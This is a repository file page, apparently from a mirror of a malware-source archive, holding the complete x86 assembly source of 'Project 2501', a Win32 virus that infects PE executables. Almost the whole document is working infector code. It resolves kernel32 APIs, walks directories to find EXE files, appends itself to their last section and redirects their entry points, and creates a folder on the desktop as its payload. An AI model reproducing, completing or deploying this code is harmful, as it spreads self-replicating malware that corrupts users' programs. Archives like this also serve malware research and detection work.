ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/Win32/Infector/Win32.Project2501.asm

579 lines
14 KiB
NASM
Raw Normal View History

Add files via upload
2020-10-11 03:09:34 +00:00
comment *
Name: Project 2501
OS: Win32
Coder Belial
Heya ,
this is my first Pe-infector.Wow ,a great feeling
to have finished it.
Credits go out to Lord Julus and BillyBelcebub ,because
of their win32 tuturials.Without them ,i would never
have finished this creation.It took me nearly a year to of reading
to understand all the important aspects of Win32-Assembly.
Greetings go out Wallo ,Raven and the whole Virus-channel on undernet.
Also greetings to BillyBoy from Micro$oft.Thanx for your
nice viriiparadise-OS.But not soooooo much bugs in future ,ok?
I tested this virus only under Win98 ,so I dont know
wether it works under WinME ,WinNT or Win95.But Im sure somebody will try
it out.
The Virus is a runtime exe infector.It infects all files
in current dir and all his subdirectories.After this ,it makes
one dotdot and infects new files and subdirs until it is
in c:\ or five dotdots are done.The only payload my virus has
is a directory on the desktop named "Project2501".It is
created each run.Im thinking of putting a txtfile
in this directory ,but I have no real motivation
at the moment.A bedder payload is in progress.And
a nice encryption ,I hope.If you think this virus
may be a bit incomplete (no encryption and no kewl
payload) than i have to say:
With releasing this source i release a loaded
gun.In the wrong hands ,it could be awful for some
harmless user.So if I release guns I dont want to release
"full-automatic-guns" .Thats for now
BeLiAL
*
.586
.model flat
.data
db 0
db 'This is the first generation of project2501'
.code
start:
call delta_setup
delta_setup:
pop ebp
sub ebp,offset delta_setup
get_those_apis:
mov eax,dword ptr [esp]
and eax,0ffff0000h
mov ecx,0
call find_mz_and_pe
call find_all_apis
Infection_part:
mov byte ptr [ebp+dir_counter],0
mov byte ptr [ebp+am_i_up],0
mov eax,dword ptr [ebp+image_base]
mov dword ptr [ebp+image_base2],eax
mov eax,dword ptr [ebp+old_entry_point]
mov dword ptr [ebp+old_entry_point2],eax
call seek_and_destroy
payload_part:
call payload
reanimation_part:
cmp ebp,0
je exit_here
mov eax,dword ptr [ebp+image_base2]
add eax,dword ptr [ebp+old_entry_point2]
jmp eax
exit_here:
push 0
call [ebp+ExitProcess]
find_mz_and_pe proc
add ecx,1
cmp ecx,11
je mz_not_found
mov bx,word ptr [eax]
cmp bx,'ZM'
je find_the_pe
sub eax,010000h
jmp find_mz_and_pe
find_the_pe:
mov esi,eax
mov ebx,dword ptr [eax+3ch]
add eax,ebx
mov bx,word ptr [eax]
cmp bx,'EP'
jne mz_not_found
mov dword ptr [ebp+kernelbase],esi
mov dword ptr [ebp+kernelpeheader],eax
ret
mz_not_found:
jmp reanimation_part
find_mz_and_pe endp
find_apis proc
pop esi
pop eax
mov dword ptr [ebp+apinameoffset],eax
pop eax
mov dword ptr [ebp+apilenght],eax
pop eax
mov dword ptr [ebp+putitthere],eax
push esi
mov eax,dword ptr [ebp+kernelpeheader]
mov esi,dword ptr [eax+78h]
add esi,dword ptr [ebp+kernelbase]
add esi,1ch
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+adress_table_VA],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+name_table_VA],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+ordinal_table_VA],eax
mov esi,dword ptr [ebp+name_table_VA]
mov dword ptr [ebp+apicounter],00000000h
find_the_name:
push esi
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov esi,eax
mov edi,dword ptr [ebp+apinameoffset]
mov ecx,0
mov cl,byte ptr [ebp+apilenght]
cld
rep cmpsb
jz we_found_it
pop esi
add esi,4
inc dword ptr [ebp+apicounter]
jmp find_the_name
we_found_it:
pop esi ;taken from BillyBel
mov eax,dword ptr [ebp+apicounter]
shl eax,1
add eax,dword ptr [ebp+ordinal_table_VA]
mov esi,0
xchg eax,esi
lodsw
shl eax,2
add eax,dword ptr [ebp+adress_table_VA]
mov esi,eax
lodsd
add eax,dword ptr [ebp+kernelbase]
mov ecx,dword ptr [ebp+putitthere]
mov dword ptr [ecx],eax
ret
find_apis endp
find_all_apis proc
lea eax,[ebp+offset ExitProcess]
push eax
push dword ptr [ebp+exitprocesslenght]
lea eax,[ebp+offset _ExitProcess]
push eax
call find_apis
lea eax,[ebp+offset FindFirstFileA]
push eax
push dword ptr [ebp+findfirstfilelenght]
lea eax,[ebp+offset _FindFirstFileA]
push eax
call find_apis
lea eax,[ebp+offset FindNextFileA]
push eax
push dword ptr [ebp+findnextfilelenght]
lea eax,[ebp+offset _FindNextFileA]
push eax
call find_apis
lea eax,[ebp+offset CreateFileA]
push eax
push dword ptr [ebp+createfilelenght]
lea eax,[ebp+offset _CreateFileA]
push eax
call find_apis
lea eax,[ebp+offset CloseHandle]
push eax
push dword ptr [ebp+closehandlelenght]
lea eax,[ ebp+offset _CloseHandle]
push eax
call find_apis
lea eax,[ebp+offset CreateFileMappingA]
push eax
push dword ptr [ebp+createfilemappinglenght]
lea eax,[ebp+offset _CreateFileMappingA]
push eax
call find_apis
lea eax,[ebp+offset MapViewOfFile]
push eax
push dword ptr [ebp+mapviewoffilelenght]
lea eax,[ebp+offset _MapViewOfFile]
push eax
call find_apis
lea eax,[ebp+offset UnmapViewOfFile]
push eax
push dword ptr [ebp+unmapviewoffilelenght]
lea eax,[ebp+offset _UnmapViewOfFile]
push eax
call find_apis
lea eax,[ebp+offset GetFileSize]
push eax
push dword ptr [ebp+getfilesizelenght]
lea eax,[ebp+offset _GetFileSize]
push eax
call find_apis
lea eax,[ebp+offset SetFilePointer]
push eax
push dword ptr [ebp+setfilepointerlenght]
lea eax,[ebp+offset _SetFilePointer]
push eax
call find_apis
lea eax,[ebp+offset SetEndOfFile]
push eax
push dword ptr [ebp+setendoffilelenght]
lea eax,[ebp+offset _SetEndOfFile]
push eax
call find_apis
lea eax,[ebp+offset SetCurrentDirectoryA]
push eax
push dword ptr [ebp+setcurrentdirectorylenght]
lea eax,[ebp+offset _SetCurrentDirectoryA]
push eax
call find_apis
lea eax,[ebp+offset CreateDirectoryA]
push eax
push dword ptr [ebp+createdirectorylenght]
lea eax,[ebp+offset _CreateDirectoryA]
push eax
call find_apis
ret
find_all_apis endp
seek_and_destroy proc
find_first_file:
mov byte ptr [ebp+infection_flag],0
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset tosearch]
push eax
call [ebp+FindFirstFileA]
mov dword ptr [ebp+findfilehandle],eax
inc eax
jz no_files_left
jmp open_the_file
find_next_file:
mov byte ptr [ebp+infection_flag],0
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+findfilehandle]
call [ebp+FindNextFileA]
test eax,eax
jz no_files_left
open_the_file:
push 0
push 0
push 3
push 0
push 1
push 80000000h + 40000000h
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+CreateFileA]
cmp eax,0ffffffffh
je find_next_file
mov dword ptr [ebp+filehandle],eax
push 0
push dword ptr [ebp+filehandle]
Call [ebp+GetFileSize]
calculate_new_size:
mov dword ptr [ebp+thefilesize],eax
add eax,virus_end-start
add eax,100
now_make_file_mapping:
push 0
push eax
push 0
push 4
push 0
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMappingA]
mov dword ptr [ebp+filemappinghandle],eax
mov eax,dword ptr [ebp+thefilesize]
add eax,virus_end-start
add eax,100
push eax
push 0
push 0
push 2
push dword ptr [ebp+filemappinghandle]
call [ebp+MapViewOfFile]
mov dword ptr [ebp+mapadress],eax
cmp word ptr [eax],'ZM'
jne search_another
mov ebx,0
mov bx,word ptr [eax+3ch]
cmp word ptr [eax+ebx],'EP'
jne search_another
cmp word ptr [eax+38h],'AA'
je search_another
call infect_file
search_another:
cmp byte ptr [ebp+infection_flag],1
je close_normal
call close_not_normal
close_normal:
push dword ptr [ebp+mapadress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemappinghandle]
call [ebp+CloseHandle]
push dword ptr [ebp+filehandle]
call [ebp+CloseHandle]
jmp find_next_file
no_files_left:
cmp byte ptr [ebp+am_i_up],1
je go_down
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset allfiles]
push eax
call [ebp+FindFirstFileA]
mov dword ptr [ebp+dir_search_handle],eax
inc eax
jz no_dirs_left
cmp byte ptr [ebp+FindFileData.cFileName],'.'
je find_next_dir
jmp is_it_dir
find_next_dir:
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+dir_search_handle]
call [ebp+FindNextFileA]
test eax,eax
jz no_dirs_left
cmp byte ptr [ebp+FindFileData.cFileName],'.'
je find_next_dir
is_it_dir:
cmp dword ptr [ebp+FindFileData.dwFileAttributes],10h
je it_is_dir
jmp find_next_dir
it_is_dir:
lea eax,[ebp+FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectoryA]
mov byte ptr [ebp+am_i_up],1
jmp find_first_file
no_dirs_left:
lea eax,[ebp+offset dotdot]
push eax
call [ebp+SetCurrentDirectoryA]
add byte ptr [ebp+dir_counter],1
cmp byte ptr [ebp+dir_counter],5
je all_for_now
mov byte ptr [ebp+am_i_up],0
jmp find_first_file
all_for_now:
ret
go_down:
lea eax,[ebp+offset dotdot]
push eax
call [ebp+SetCurrentDirectoryA]
mov byte ptr [ebp+am_i_up],0
jmp find_next_dir
seek_and_destroy endp
close_not_normal proc
push 0
push 0
push dword ptr [ebp+thefilesize]
push dword ptr [ebp+filehandle]
call [ebp+SetFilePointer]
push dword ptr [ebp+filehandle]
call [ebp+SetEndOfFile]
ret
close_not_normal endp
infect_file proc
mov byte ptr [ebp+infection_flag],1
mov eax,dword ptr [ebp+mapadress]
mov word ptr [eax+38h],'AA'
mov edi,0
mov di,word ptr [eax+3ch]
add eax,edi ;peheader at eax
mov dword ptr [ebp+peheader_offset],eax
mov esi,dword ptr [eax+28h]
mov dword ptr [ebp+old_entry_point],esi
mov esi,dword ptr [eax+3ch]
mov dword ptr [ebp+file_allign],esi
mov esi,dword ptr [eax+34h]
mov dword ptr [ebp+image_base],esi
mov esi,eax
go_to_last_section:
mov ebx,dword ptr [esi+74h]
shl ebx,3
mov eax,0
mov ax,word ptr [esi+6h]
dec eax
mov ecx,28h
mul ecx
add esi,78h
add esi,ebx
add esi,eax
modify_it:
or dword ptr [esi+24h],00000020h
or dword ptr [esi+24h],20000000h
or dword ptr [esi+24h],80000000h
mov eax, [esi+10h] ;code taken from Lord Julus (im not good in math)
mov dword ptr [ebp+old_raw_size],eax
add dword ptr [esi+8h],(offset virus_end - offset start)
mov eax,dword ptr [esi+8h]
mov ecx,dword ptr [ebp+file_allign]
div ecx
mov ecx,dword ptr [ebp+file_allign]
sub ecx,edx
mov dword ptr [esi+10h],eax
mov eax,dword ptr [esi+8h]
add eax,dword ptr [esi+10h]
mov dword ptr [esi+10h],eax
mov dword ptr [ebp+new_raw_size],eax
mov eax,dword ptr [esi+0ch]
add eax,dword ptr [esi+8h]
sub eax,(offset virus_end-offset start)
mov dword ptr [ebp+new_entry],eax
mov eax,dword ptr [ebp+old_raw_size]
mov ebx,dword ptr [ebp+new_raw_size]
sub ebx,eax
mov dword ptr [ebp+inc_raw_size],ebx
mov eax,dword ptr [esi+14h]
add eax,dword ptr [ebp+new_raw_size]
mov dword ptr [ebp+new_file_size],eax
mov eax,dword ptr [esi+14h]
add eax,dword ptr [esi+8]
sub eax,(offset virus_end-offset start)
add eax,dword ptr [ebp+mapadress]
mov edi,eax
lea esi,[ebp+offset start]
mov ecx,(offset virus_end-offset start)
rep movsb
mov esi,dword ptr [ebp+peheader_offset]
mov eax,dword ptr [ebp+new_entry]
mov dword ptr [esi+28h],eax
mov eax,dword ptr [ebp+inc_raw_size]
add dword ptr [esi+50h],eax
ret
infect_file endp
payload proc
push 0
lea eax,[ebp+offset dir_name]
push eax
call [ebp+CreateDirectoryA]
ret
payload endp
new_file_size dd 0
inc_raw_size dd 0
new_entry dd 0
new_raw_size dd 0
old_raw_size dd 0
file_allign dd 0
peheader_offset dd 0
image_base dd 0
old_entry_point dd 0
image_base2 dd 0
old_entry_point2 dd 0
kernelbase dd 0
kernelpeheader dd 0
adress_table_VA dd 0
name_table_VA dd 0
ordinal_table_VA dd 0
apicounter dd 00000000h
apinameoffset dd 0
apilenght dd 0
putitthere dd 0
ExitProcess dd 00000000h
_ExitProcess db 'ExitProcess',0
exitprocesslenght dd 12
FindFirstFileA dd 00000000h
_FindFirstFileA db 'FindFirstFileA',0
findfirstfilelenght dd 15
FindNextFileA dd 00000000h
_FindNextFileA db 'FindNextFileA',0
findnextfilelenght dd 14
CreateFileA dd 00000000h
_CreateFileA db 'CreateFileA',0
createfilelenght dd 12
CloseHandle dd 00000000h
_CloseHandle db 'CloseHandle',0
closehandlelenght dd 12
CreateFileMappingA dd 00000000h
_CreateFileMappingA db 'CreateFileMappingA',0
createfilemappinglenght dd 19
MapViewOfFile dd 00000000h
_MapViewOfFile db 'MapViewOfFile',0
mapviewoffilelenght db 14
UnmapViewOfFile dd 00000000h
_UnmapViewOfFile db 'UnmapViewOfFile',0
unmapviewoffilelenght dd 16
GetFileSize dd 00000000h
_GetFileSize db 'GetFileSize',0
getfilesizelenght dd 12
SetEndOfFile dd 00000000h
_SetEndOfFile db 'SetEndOfFile',0
setendoffilelenght dd 13
SetFilePointer dd 00000000h
_SetFilePointer db 'SetFilePointer',0
setfilepointerlenght dd 15
SetCurrentDirectoryA dd 0
_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0
setcurrentdirectorylenght dd 21
CreateDirectoryA dd 0
_CreateDirectoryA db 'CreateDirectoryA',0
createdirectorylenght dd 17
mapadress dd 0
infection_flag db 0
tosearch db '*.EXE',0
findfilehandle dd 0
filehandle dd 0
thefilesize dd 0
filemappinghandle dd 0
credit db 'Project2501 was coded by BeLiAL'
db 'Greetings to a nice girl from scandinavia'
dotdot db '..',0
allfiles db '*.*',0
dir_search_handle dd 0
am_i_up db 0
dir_name db 'c:\windows\desktop\Project2501',0
dir_counter db 0
MAX_PATH EQU 260
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
virus_end:
end start
Reference in New Issue Copy Permalink